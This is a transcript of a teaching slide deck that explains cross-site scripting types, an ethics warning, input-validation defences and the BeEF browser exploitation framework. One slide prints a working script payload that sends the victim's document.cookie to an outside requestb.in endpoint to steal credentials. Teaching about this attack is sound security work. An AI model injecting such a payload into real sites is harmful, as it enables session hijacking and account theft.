Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Got BeEf?

Got BeEf?

Cameron Lonsdale

August 01, 2017
Tweet

More Decks by Cameron Lonsdale

Other Decks in Programming

Transcript

  1. • What you are learning can be used for malicious

    purposes. • Myself, the university or anyone else are NOT responsible for your actions. • Do NOT, UNDER ANY CIRCUMSTANCES, illegally attempt to gain access to systems you do not own. • If you are not sure, DON’T DO IT. A NOTE ON ETHICS...
  2. CROSS-SITE SCRIPTING WOW • Just a pop-up? • Injecting Java

    Script • Abusing the trust a user has on the app • More than 50% applications across the globe vulnerable to this
  3. XSS – THINGS TO LOOK FOR • Client send a

    request with malicious input. • Server stores the script in the database. • When victim visits the page, script loads. • BOOM! XSS • Client sends a request with malicious input to the server. • Server sends back the user input without validation. • Browser executes the malicious code. • BOOM! XSS DOM Based XSS is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. REFLECTED XSS STORED XSS DOM-BASED XSS
  4. Example Attacks Steal user credentials <script>var i = new Image();i.src

    = "http://requestb.in/1bycym81/?c="+document.cookie;</script> Phishing Attacks
  5. [DEFENSIVE] MAKE NO ASSUMPTIONS Don’t trust user input. Before you

    use an input, validate it. Don’t trust other systems you talk to. Validate all data you rely on. Validate both format and value – attacks aren’t just semantic.
  6. BeEf - Browser Exploitation Framework • http://beefproject.com/ • Easy to

    use, point and click attacks on targets • Works by hooking a victim with an XSS payload • Can take photos of the person's screen and turn on their webcam ~all hail the demo gods~
  7. READING MATERIAL (REFERENCE) • OWASP XSS: • https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) • https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sh

    eet • XSS Shortening Cheat Sheet: • https://labs.neohapsis.com/2012/04/19/xss-shortening-cheats heet/ • https://excess-xss.com/ • http://beefproject.com/